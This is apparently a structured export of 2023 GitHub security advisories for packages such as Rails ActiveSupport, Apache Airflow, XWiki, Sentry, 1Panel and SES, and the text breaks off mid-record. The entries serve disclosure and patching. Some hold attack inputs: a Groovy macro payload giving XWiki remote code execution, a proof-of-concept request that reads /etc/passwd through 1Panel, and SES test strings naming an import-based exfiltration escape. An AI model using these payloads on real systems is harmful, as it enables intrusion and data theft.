5.2.0 Fixed Versions: 7.0.7.1, 6.1.7.5 # Impact ActiveSupport::EncryptedFile writes contents that will be encrypted to a temporary file. The temporary file’s permissions are defaulted to the user’s current umask settings, meaning that it’s possible for other users on the same system to read the contents of the temporary file. Attackers that have access to the file system could possibly read the contents of this temporary file while a user is editing it. All users running an affected release should either upgrade or use one of the workarounds immediately. # Releases The fixed releases are available at the normal locations. # Workarounds To work around this issue, you can set your umask to be more restrictive like this: ```ruby $ umask 0077 ``` ",[],"[{'package': {'ecosystem': 'RubyGems', 'name': 'activesupport'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '6.1.7.5'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'activesupport'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/a21d6edf35a60383dfa6c4da49e4b1aef5f00731'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/releases/tag/v7.0.7.1'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activesupport/CVE-2023-38037.yml'}]","{'cwe_ids': ['CWE-377'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T20:36:24Z', 'nvd_published_at': None}" 1.4.0,GHSA-r2f6-6928-fh8f,2023-08-24T20:22:29Z,2023-08-17T15:30:23Z,,['CVE-2023-40272'],Apache Airflow Spark Provider Improper Input Validation vulnerability,"Apache Airflow Spark Provider, versions before 4.1.3, is affected by a vulnerability that allows an attacker to pass in malicious parameters when establishing a connection giving an opportunity to read files on the Airflow server. It is recommended to upgrade to a version that is not affected. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-apache-spark'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40272'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/t03gktyzyor20rh06okd91jtqmw6k1l7'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/17/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/18/1'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-17T19:06:45Z', 'nvd_published_at': None}" 1.4.0,GHSA-jfrf-vv54-j2jg,2023-08-18T14:25:24Z,2023-08-11T15:30:46Z,,['CVE-2021-27524'],Margox Braft-Editor Cross-site Scripting Vulnerability,"Cross Site Scripting (XSS) vulnerability in margox braft-editor version 2.3.8, allows remote attackers to execute arbitrary code via the embed media feature.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'braft-editor'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.3.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27524'}, {'type': 'WEB', 'url': 'https://github.com/margox/braft-editor/issues/880'}, {'type': 'PACKAGE', 'url': 'https://github.com/margox/braft-editor'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T22:06:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-vj49-j7rc-h54f,2023-09-01T17:35:22Z,2023-08-25T21:30:48Z,,['CVE-2023-24620'],Esoteric YamlBeans XML Entity Expansion vulnerability,"An issue was discovered in Esoteric YamlBeans through 1.15. A crafted YAML document is able perform am XML Entity Expansion attack against YamlBeans YamlReader. By exploiting the Anchor feature in YAML, it is possible to generate a small YAML document that, when read, is expanded to a large size, causing CPU and memory consumption, such as a Java Out-of-Memory exception.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.esotericsoftware.yamlbeans:yamlbeans'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24620'}, {'type': 'WEB', 'url': 'https://contrastsecurity.com'}, {'type': 'WEB', 'url': 'https://github.com/Contrast-Security-OSS/yamlbeans/blob/main/SECURITY.md'}, {'type': 'WEB', 'url': 'https://github.com/EsotericSoftware'}, {'type': 'PACKAGE', 'url': 'https://github.com/EsotericSoftware/yamlbeans'}]","{'cwe_ids': ['CWE-400', 'CWE-611'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-25T22:04:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-9cvc-v7wm-992c,2023-08-15T20:04:14Z,2023-08-15T20:04:14Z,,['CVE-2023-40027'],"When `ui.isAccessAllowed` is `undefined`, the `adminMeta` GraphQL query is publicly accessible","### Summary When `ui.isAccessAllowed` is `undefined`, the `adminMeta` GraphQL query is publicly accessible, that is to say, no session is required for the query. This is different to the behaviour of the default AdminUI middleware, which by default will only be publicly accessible if a `session` strategy is not defined. ### Impact This vulnerability does not affect developers using the `@keystone-6/auth` package, or any users that have written their own `ui.isAccessAllowed` (that is to say, you are unaffected if `ui.isAccessAllowed` is defined). This vulnerability does affect developers who thought that their `session` strategy will, by default, enforce that `adminMeta` is inaccessible by the public in accordance with that strategy; akin to the behaviour of the AdminUI middleware. ### Patches This vulnerability has been patched in `@keystone-6/core` version `5.5.1`. ### Workarounds You can opt to write your own `isAccessAllowed` to work-around this vulnerability. ### References Pull request https://github.com/keystonejs/keystone/pull/8771 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@keystone-6/core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.5.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/keystonejs/keystone/security/advisories/GHSA-9cvc-v7wm-992c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40027'}, {'type': 'WEB', 'url': 'https://github.com/keystonejs/keystone/pull/8771'}, {'type': 'WEB', 'url': 'https://github.com/keystonejs/keystone/commit/650e27e6e9b42abfb94c340c8470faf61f0ff284'}, {'type': 'PACKAGE', 'url': 'https://github.com/keystonejs/keystone'}, {'type': 'WEB', 'url': 'https://github.com/keystonejs/keystone/releases/tag/2023-08-15'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T20:04:14Z', 'nvd_published_at': None}" 1.4.0,GHSA-r726-vmfq-j9j3,2023-09-01T17:44:16Z,2023-08-29T23:34:22Z,,['CVE-2023-39968'], Open Redirect Vulnerability in jupyter-server,"### Impact Open Redirect Vulnerability. Maliciously crafted login links to known Jupyter Servers can cause successful login or an already logged-in session to be redirected to arbitrary sites, which should be restricted to Jupyter Server-served URLs. ### Patches Upgrade to Jupyter Server 2.7.2 ### Workarounds None. ### References Vulnerability reported by user davwwwx via the [bug bounty program](https://app.intigriti.com/programs/jupyter/jupyter/detail) [sponsored by the European Commission](https://commission.europa.eu/news/european-commissions-open-source-programme-office-starts-bug-bounties-2022-01-19_en) and hosted on the [Intigriti platform](https://www.intigriti.com/). - https://blog.xss.am/2023/08/CVE-2023-39968-jupyter-token-leak/ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'jupyter-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-r726-vmfq-j9j3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39968'}, {'type': 'WEB', 'url': 'https://github.com/jupyter-server/jupyter_server/commit/290362593b2ffb23c59f8114d76f77875de4b925'}, {'type': 'PACKAGE', 'url': 'https://github.com/jupyter-server/jupyter_server'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/jupyter-server/PYSEC-2023-155.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NRP7DNZYVOIA4ZB3U3ZWKTFZEPYWNGCQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XDKQAWQN6SQTOVACZNXYKEHWQXGG4DOF/'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T23:34:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-7954-6m9q-gpvf,2023-08-18T21:50:33Z,2023-08-18T21:50:33Z,,['CVE-2023-37914'],XWiki Platform privilege escalation (PR)/RCE from account through Invitation subject/message,"### Impact Any user who can view `Invitation.WebHome` can execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. This can be reproduced with the following steps: 1. Open the invitation application (Invitation.WebHome). 1. Set the subject to `{{cache}}{{groovy}}new File(""/tmp/exploit.txt"").withWriter { out -> out.println(""Attacked from invitation!""); }{{/groovy}}{{/cache}}` 1. Click ""Preview"" ### Patches The vulnerability has been patched on XWiki 14.4.8, 15.2-rc-1, and 14.10.6. ### Workarounds The vulnerability can be patched manually by applying the [patch](https://github.com/xwiki/xwiki-platform/commit/ff1d8a1790c6ee534c6a4478360a06efeb2d3591) on `Invitation.InvitationCommon` and `Invitation.InvitationConfig`. ### References - https://jira.xwiki.org/browse/XWIKI-20421 - https://github.com/xwiki/xwiki-platform/commit/ff1d8a1790c6ee534c6a4478360a06efeb2d3591 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-invitation-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5-m-1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-invitation-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-invitation-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.2-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-7954-6m9q-gpvf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37914'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/ff1d8a1790c6ee534c6a4478360a06efeb2d3591'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20421'}]","{'cwe_ids': ['CWE-94', 'CWE-95'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-18T21:50:33Z', 'nvd_published_at': None}" 1.4.0,GHSA-269x-pg5c-5xgm,2023-08-09T20:38:02Z,2023-08-05T09:30:16Z,,['CVE-2023-39508'],Apache Airflow Execution with Unnecessary Privileges,"Execution with Unnecessary Privileges, : Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Airflow.The ""Run Task"" feature enables authenticated user to bypass some of the restrictions put in place. It allows to execute code in the webserver context as well as allows to bypas limitation of access the user has to certain DAGs. The ""Run Task"" feature is considered dangerous and it has been removed entirely in Airflow 2.6.0. This issue affects Apache Airflow: before 2.6.0. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39508'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/29706'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2023-134.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/j2nkjd0zqvtqk85s6ywpx3c35pvzyx15'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2023/Jul/43'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:26:52Z', 'nvd_published_at': None}" 1.4.0,GHSA-9jcq-jf57-c62c,2023-08-08T20:46:12Z,2023-08-08T20:46:12Z,,['CVE-2023-39349'],Privilege escalation via ApiTokensEndpoint,"### Impact An attacker with access to a token with few or no scopes can query `/api/0/api-tokens/` for a list of all tokens created by a user, including tokens with greater scopes, and use those tokens in other requests. There is no evidence that the issue was exploited on https://sentry.io. For self-hosted users, it is advised to rotate user auth tokens via `https://your-self-hosted-sentry-installation/settings/account/api/auth-tokens/`. ### Patches The issue was fixed in https://github.com/getsentry/sentry/pull/53850 and is available in the release 23.7.2 of [sentry](https://github.com/getsentry/sentry/releases/tag/23.7.2) and [self-hosted](https://github.com/getsentry/self-hosted/releases/tag/23.7.2). ### Workarounds There are no known workarounds.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'sentry'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '22.1.0'}, {'fixed': '23.7.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/getsentry/sentry/security/advisories/GHSA-9jcq-jf57-c62c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39349'}, {'type': 'WEB', 'url': 'https://github.com/getsentry/sentry/pull/53850'}, {'type': 'WEB', 'url': 'https://github.com/getsentry/sentry/commit/fad12c1150d1135edf9666ea72ca11bc110c1083'}, {'type': 'WEB', 'url': 'https://github.com/getsentry/self-hosted/releases/tag/23.7.2'}, {'type': 'PACKAGE', 'url': 'https://github.com/getsentry/sentry'}, {'type': 'WEB', 'url': 'https://github.com/getsentry/sentry/releases/tag/23.7.2'}]","{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-08T20:46:12Z', 'nvd_published_at': None}" 1.4.0,GHSA-v86x-5fm3-5p7j,2023-09-01T17:34:29Z,2023-08-23T20:42:43Z,,['CVE-2023-40577'],Alertmanager UI is vulnerable to stored XSS via the /api/v1/alerts endpoint,"### Impact An attacker with the permission to perform POST requests on the /api/v1/alerts endpoint could be able to execute arbitrary JavaScript code on the users of Prometheus Alertmanager. ### Patches Users can upgrade to Alertmanager v0.2.51. ### Workarounds Users can setup a reverse proxy in front of the Alertmanager web server to forbid access to the /api/v1/alerts endpoint. ### References N/A ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/prometheus/alertmanager'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.25.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.25.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/prometheus/alertmanager/security/advisories/GHSA-v86x-5fm3-5p7j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40577'}, {'type': 'PACKAGE', 'url': 'https://github.com/prometheus/alertmanager'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T20:42:43Z', 'nvd_published_at': None}" 1.4.0,GHSA-p8gp-899c-jvq9,2023-08-24T21:48:12Z,2023-08-21T20:28:06Z,,['CVE-2023-4454'],Wallabag user can reset data unintentionally ,"# Description wallabag was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily reset annotations, entries and tags, by the GET request to `/reset/annotations`, `/reset/entries`, `/reset/tags`, `/reset/archived`. This vulnerability has a CVSSv3.1 score of 4.3. **You should immediately patch your instance to version 2.6.3 or higher if you have more than one user and/or having open registration**. # Resolution These actions are now doable only via POST method, which ensures that we can't do them via a 3rd-party website. # Credits We would like to thank @zpbrent for reporting this issue through huntr.dev. Reference: https://huntr.dev/bounties/4ee0ef74-e4d4-46e7-a05c-076bce522299/","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'wallabag/wallabag'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-alpha.1'}, {'fixed': '2.6.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.6.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/security/advisories/GHSA-p8gp-899c-jvq9'}, {'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/commit/78b0b55c40511e1f22d5bbb4897aa10fca68441c'}, {'type': 'PACKAGE', 'url': 'https://github.com/wallabag/wallabag'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4ee0ef74-e4d4-46e7-a05c-076bce522299/'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:28:06Z', 'nvd_published_at': None}" 1.4.0,GHSA-rvm8-j2cp-j592,2023-08-31T14:48:17Z,2023-08-29T00:32:04Z,,['CVE-2023-40827'],pf4j vulnerable to remote code execution via loadpluginPath parameter,An issue in pf4j pf4j v.3.9.0 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the loadpluginPath parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.pf4j:pf4j'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.9.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40827'}, {'type': 'WEB', 'url': 'https://github.com/pf4j/pf4j/issues/536'}, {'type': 'WEB', 'url': 'https://github.com/pf4j/pf4j/pull/537'}, {'type': 'WEB', 'url': 'https://github.com/pf4j/pf4j/pull/537/commits/ed9392069fe14c6c30d9f876710e5ad40f7ea8c1'}, {'type': 'PACKAGE', 'url': 'https://github.com/pf4j/pf4j'}]","{'cwe_ids': ['CWE-22', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T17:41:24Z', 'nvd_published_at': None}" 1.4.0,GHSA-pv2g-vm98-vjxf,2023-08-18T14:26:03Z,2023-08-16T15:30:18Z,,['CVE-2023-40339'],Jenkins Config File Provider Plugin improper credential masking vulnerability,"Jenkins Config File Provider Plugin 952.va_544a_6234b_46 and earlier does not mask (i.e., replace with asterisks) credentials specified in configuration files when they’re written to the build log. Config File Provider Plugin 953.v0432a_802e4d2 masks credentials configured in configuration files if they appear in the build log.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:config-file-provider'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '953.v0432a'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40339'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3090'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:13:44Z', 'nvd_published_at': None}" 1.4.0,GHSA-9v85-q87q-g4vg,2023-09-07T14:31:28Z,2023-08-31T00:30:17Z,,['CVE-2023-39139'],Path traversal in Archive,An issue in Archive v3.3.7 allows attackers to execute a path traversal via extracting a crafted zip file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Pub', 'name': 'archive'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.7'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39139'}, {'type': 'WEB', 'url': 'https://github.com/brendan-duncan/archive/issues/265'}, {'type': 'WEB', 'url': 'https://github.com/brendan-duncan/archive/commit/6de492385d72af044231c4163dff13a43d991c83'}, {'type': 'WEB', 'url': 'https://github.com/brendan-duncan/archive/commit/edb0d480733a44d28ff3d5e4e2779153ba645ce7'}, {'type': 'WEB', 'url': 'https://blog.ostorlab.co/zip-packages-exploitation.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/brendan-duncan/archive'}, {'type': 'WEB', 'url': 'https://ostorlab.co/vulndb/advisory/OVE-2023-5'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-31T01:42:46Z', 'nvd_published_at': None}" 1.4.0,GHSA-pv7q-v9mv-9mh5,2023-08-10T20:09:07Z,2023-08-10T20:09:07Z,,['CVE-2023-39964'],1Panel O&M management panel has a background arbitrary file reading vulnerability,"### Summary Arbitrary file reads allow an attacker to read arbitrary important configuration files on the server. ### Details In the api/v1/file.go file, there is a function called LoadFromFile, which directly reads the file by obtaining the requested path parameter[path]. The request parameters are not filtered, resulting in a background arbitrary file reading vulnerability ![picture1](https://user-images.githubusercontent.com/136411443/257109786-1b0af1e7-346f-4e92-9da2-d977f2f7fe6a.jpg) ### PoC Request /api/v1/files/loadfile, carry /etc/passwd data to read, as shown below: ![微信图片_20230731112833](https://user-images.githubusercontent.com/136411443/257109931-108fc16f-e180-4d1e-996c-d9da5f76559f.png) ### Impact 1Panel v1.4.3 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/1Panel-dev/1Panel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.3'}, {'fixed': '1.5.0'}]}], 'versions': ['1.4.3']}]","[{'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-pv7q-v9mv-9mh5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39964'}, {'type': 'PACKAGE', 'url': 'https://github.com/1Panel-dev/1Panel'}, {'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/releases/tag/v1.5.0'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-10T20:09:07Z', 'nvd_published_at': None}" 1.4.0,GHSA-9c4h-3f7h-322r,2023-08-09T14:43:20Z,2023-08-09T14:43:20Z,,['CVE-2023-39532'],SES's dynamic import and spread operator provides possible path to arbitrary exfiltration and execution,"### Impact This is a hole in the confinement of guest applications under SES that may manifest as either the ability to exfiltrate information or execute arbitrary code depending on the configuration and implementation of the surrounding host. Guest program running inside a Compartment with as few as no endowments can gain access to the surrounding host’s dynamic import by using dynamic import after the spread operator, like `{...import(arbitraryModuleSpecifier)}`. On the web or in web extensions, a Content-Security-Policy following ordinary best practices likely mitigates both the risk of exfiltration and execution of arbitrary code, at least limiting the modules that the attacker can import to those that are already part of the application. However, without a Content-Security-Policy, dynamic import can be used to issue HTTP requests for either communication through the URL or for the execution of code reachable from that origin. Within an XS worker, an attacker can use the host’s module system to the extent that the host has been configured. This typically only allows access to module code on the host’s file system and is of limited use to an attacker. Within Node.js, the attacker gains access to Node.js’s module system. Importing the powerful builtins is not useful except insofar as there are side-effects and tempered because dynamic import returns a promise. Spreading a promise into an object renders the promises useless. However, Node.js allows importing data URLs, so this is a clear path to arbitrary execution. ### Patches All affected `0.*` version trains have the following patch. Running `npm update` will obtain the patch on all affected projects using `^0.*` style dependency constraints in their `package.json`. ```diff From 33469e88bfb2bf34a161c265f10f808ce354a700 Mon Sep 17 00:00:00 2001 From: Kris Kowal Date: Thu, 27 Jul 2023 13:25:13 -0700 Subject: [PATCH] fix(fix): Censor spread import --- packages/ses/src/transforms.js | 2 +- packages/ses/test/test-transforms.js | 22 +++++++++++++++++++++- 2 files changed, 22 insertions(+), 2 deletions(-) diff --git a/packages/ses/src/transforms.js b/packages/ses/src/transforms.js index a0fc8d0ef..64a46cb53 100644 --- a/packages/ses/src/transforms.js +++ b/packages/ses/src/transforms.js @@ -106,7 +106,7 @@ export const evadeHtmlCommentTest = src => { // ///////////////////////////////////////////////////////////////////////////// const importPattern = new FERAL_REG_EXP( - '(^|[^.])\\bimport(\\s*(?:\\(|/[/*]))', + '(^|[^.]|\\.\\.\\.)\\bimport(\\s*(?:\\(|/[/*]))', 'g', ); diff --git a/packages/ses/test/test-transforms.js b/packages/ses/test/test-transforms.js index cef0c02c1..8f6818b83 100644 --- a/packages/ses/test/test-transforms.js +++ b/packages/ses/test/test-transforms.js @@ -6,7 +6,7 @@ import { } from '../src/transforms.js'; test('no-import-expression regexp', t => { - t.plan(9); + t.plan(13); // Note: we cannot define these as regular functions (and then stringify) // because the 'esm' module loader that we use for running the tests (i.e. @@ -20,6 +20,7 @@ test('no-import-expression regexp', t => { const safe = 'const a = 1'; const safe2 = ""const a = notimport('evil')""; const safe3 = ""const a = importnot('evil')""; + const safe4 = ""const a = compartment.import('name')""; const obvious = ""const a = import('evil')""; const whitespace = ""const a = import ('evil')""; @@ -27,10 +28,14 @@ test('no-import-expression regexp', t => { const doubleSlashComment = ""const a = import // hah\n('evil')""; const newline = ""const a = import\n('evil')""; const multiline = ""\nimport('a')\nimport('b')""; + const spread = ""{...import('exfil')}""; + const spread2 = ""{\n...\nimport\n('exfil')}""; + const spread3 = ""{\n...\nimport/**/\n('exfil')}""; t.is(rejectImportExpressions(safe), safe, 'safe'); t.is(rejectImportExpressions(safe2), safe2, 'safe2'); t.is(rejectImportExpressions(safe3), safe3, 'safe3'); + t.is(rejectImportExpressions(safe4), safe4, 'safe4'); t.throws( () => rejectImportExpressions(obvious), { instanceOf: SyntaxError }, @@ -62,6 +67,21 @@ test('no-import-expression regexp', t => { 'possible import expression rejected around line 2', 'multiline', ); + t.throws( + () => rejectImportExpressions(spread), + { instanceOf: SyntaxError }, + 'spread', + ); + t.throws( + () => rejectImportExpressions(spread2), + { instanceOf: SyntaxError }, + 'spread2', + ); + t.throws( + () => rejectImportExpressions(spread3), + { instanceOf: SyntaxError }, + 'spread3', + ); }); test('no-html-comment-expression regexp', t => { -- 2.40.1 ``` ### Workarounds On the web, providing a suitably constrained Content-Security-Policy mitigates most of the threat. With XS, building a binary that lacks the ability to load modules at runtime mitigates the entirety of the threat. That will look like an implementation of `fxFindModule` in a file like `xsPlatform.c` that calls `fxRejectModuleFile`. We highly advise applying the above patch for Node.js as there is no known work-around and Node.js’s module specifiers are exceedingly powerful, including support for `data:text/javascript,` style module specifier URLs. ### References No references at this time.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': 